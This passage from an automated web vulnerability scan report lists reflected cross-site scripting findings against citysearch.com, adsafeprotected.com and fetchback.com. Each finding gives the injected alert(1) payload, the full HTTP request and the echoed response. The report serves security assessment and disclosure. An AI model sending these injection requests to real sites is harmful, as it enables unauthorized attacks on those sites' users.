Set-Cookie: usrid=d69fa7e554d0a10a718d2fe695adaccc8bba1c28; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:13 GMT; Path=/
Set-Cookie: cs_session=60da67a061bc6b32e8cc34ec0bc8d299827a70c5; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:13 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:13 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:13 GMT; Path=/
Set-Cookie: recent_geos=69794%7E%7CPittsburgh; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:13 GMT; Path=/
Set-Cookie: tseg=848; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:13 GMT; Path=/
Set-Cookie: userSearchLoc=Pittsburgh%2C%20PA%7E%7C69794; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:13 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 64496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link rel="canonical" href="http://pittsburgh.citysearch.com/guide/pittsburgh-pa/x26amp?21a0f"><script>alert(1)</script>9c07a67884d=1" />
...[SNIP]...

3.276. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /listings/bloomfield/musical_instruments/8667_3948

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a46c"><img%20src%3da%20onerror%3dalert(1)>da470ffd4e0 was submitted in the REST URL parameter 2. This input was echoed as 6a46c"><img src=a onerror=alert(1)>da470ffd4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /listings/bloomfield6a46c"><img%20src%3da%20onerror%3dalert(1)>da470ffd4e0/musical_instruments/8667_3948 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:38 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=eab5605139476f5ffbfe6499a3d40ec9ea63650a; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:38 GMT; Path=/
Set-Cookie: cs_session=2d7b669341af42bf0f7a290aa6b816f2be48fb13; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:38 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:38 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:38 GMT; Path=/
Set-Cookie: recent_geos=8667%7E%7CBloomfield; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:38 GMT; Path=/
Set-Cookie: tseg=71; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:38 GMT; Path=/
Set-Cookie: userSearchLoc=Bloomfield%20%28Pittsburgh%2C%20PA%29%7E%7C8667; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:38 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 65014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<input name="where" id="filter:where" type="hidden" value="bloomfield6a46c"><img src=a onerror=alert(1)>da470ffd4e0" />
...[SNIP]...

3.277. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /listings/bloomfield/musical_instruments/8667_3948

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac61d"><img%20src%3da%20onerror%3dalert(1)>cacbbb22cec was submitted in the REST URL parameter 3. This input was echoed as ac61d"><img src=a onerror=alert(1)>cacbbb22cec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /listings/bloomfield/musical_instrumentsac61d"><img%20src%3da%20onerror%3dalert(1)>cacbbb22cec/8667_3948 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:51 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:51 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=f5ff0092c0269684beef07934aaa870c1c9371c2; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:51 GMT; Path=/
Set-Cookie: cs_session=b0c0593abce4beb60e5b4d88bead462f5d5a680c; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:51 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:51 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:51 GMT; Path=/
Set-Cookie: recent_geos=8667%7E%7CBloomfield; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:51 GMT; Path=/
Set-Cookie: tseg=823; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:51 GMT; Path=/
Set-Cookie: userSearchLoc=Bloomfield%20%28Pittsburgh%2C%20PA%29%7E%7C8667; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:51 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 57597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<input name="tagName" id="filter:tagName" type="hidden" value="musical_instrumentsac61d"><img src=a onerror=alert(1)>cacbbb22cec" />
...[SNIP]...

3.278. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /listings/bloomfield/musical_instruments/8667_3948/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf296"><script>alert(1)</script>915b0164ca9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /listings/bloomfield/musical_instruments/8667_3948/x22?cf296"><script>alert(1)</script>915b0164ca9=1 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /listings/bloomfield/musical_instruments/8667_3948/x22
Date: Sat, 26 Feb 2011 02:12:58 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:12:58 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: usrid=60b9ad0426bf6582b94ea75a479ea44d9be383ce; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:12:58 GMT; Path=/
Set-Cookie: cs_session=d11a5e0f1728cb13879eba43ec96db5dabdc99f7; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:42:58 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:42:58 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:42:58 GMT; Path=/
Set-Cookie: recent_geos=71473%7E%7CDallas; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:12:58 GMT; Path=/
Set-Cookie: tseg=387; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:12:58 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 17810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link rel="canonical" href="http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948/x22?cf296"><script>alert(1)</script>915b0164ca9=1" />
...[SNIP]...

3.279. http://pixel.adsafeprotected.com/jspix [advId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the advId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a727c"-alert(1)-"0a1ceb9fb9d was submitted in the advId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384a727c"-alert(1)-"0a1ceb9fb9d&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CC3AB6842D7B651D85CA7B6C4E1FC931; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384a727c"-alert(1)-"0a1ceb9fb9d&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"di
...[SNIP]...

3.280. http://pixel.adsafeprotected.com/jspix [anId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17607"-alert(1)-"736181fd054 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=13417607"-alert(1)-"736181fd054&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A51403344CE6616473144CCAD1E6CB41; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
os_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=13417607"-alert(1)-"736181fd054&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG
...[SNIP]...

3.281. http://pixel.adsafeprotected.com/jspix [campId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41148"-alert(1)-"97cd6e245a9 was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=539639741148"-alert(1)-"97cd6e245a9&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=134E3C18FDC2B7E1829554984D119392; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
83032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=539639741148"-alert(1)-"97cd6e245a9&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=funct
...[SNIP]...

3.282. http://pixel.adsafeprotected.com/jspix [chanId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the chanId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d9e"-alert(1)-"bdc978586f7 was submitted in the chanId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132b7d9e"-alert(1)-"bdc978586f7&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FD1080344A4046555CB1ACB98C897FBC; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132b7d9e"-alert(1)-"bdc978586f7&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typ
...[SNIP]...

3.283. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bc6"-alert(1)-"70137643fe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126&89bc6"-alert(1)-"70137643fe4=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=21B1BE1ED3A87016416FACEF53861DE9; Path=/
Connection: keep-alive
Content-Length: 8644


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
rd=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126&89bc6"-alert(1)-"70137643fe4=1",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if
...[SNIP]...

3.284. http://pixel.adsafeprotected.com/jspix [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the placementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e10"-alert(1)-"ffa02563ec8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=6221420713e10"-alert(1)-"ffa02563ec8&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C985B7FA5991596DFB034D9DA273D364; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
s_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=6221420713e10"-alert(1)-"ffa02563ec8&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){
...[SNIP]...

3.285. http://pixel.adsafeprotected.com/jspix [pubId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71116"-alert(1)-"f92110ae5 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=103612671116"-alert(1)-"f92110ae5 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8E2733FC94ED1B7A52E98C8CA0FAC74F; Path=/
Connection: keep-alive
Content-Length: 8639


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=103612671116"-alert(1)-"f92110ae5",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if(p
...[SNIP]...

3.286. https://pixel.fetchback.com/serve/fb/pdc [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload a357e<x%20style%3dx%3aexpression(alert(1))>1c33ad700db was submitted in the name parameter. This input was echoed as a357e<x style=x:expression(alert(1))>1c33ad700db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landinga357e<x%20style%3dx%3aexpression(alert(1))>1c33ad700db&sid=782 HTTP/1.1
Host: pixel.fetchback.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:15:52 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303179352_1660:29; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: uid=1_1303179352_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: kwd=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: sit=1_1303179352_782:29:29; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: cre=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: bpd=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: apd=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: scg=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: ppd=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Set-Cookie: afl=1_1303179352; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:15:52 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
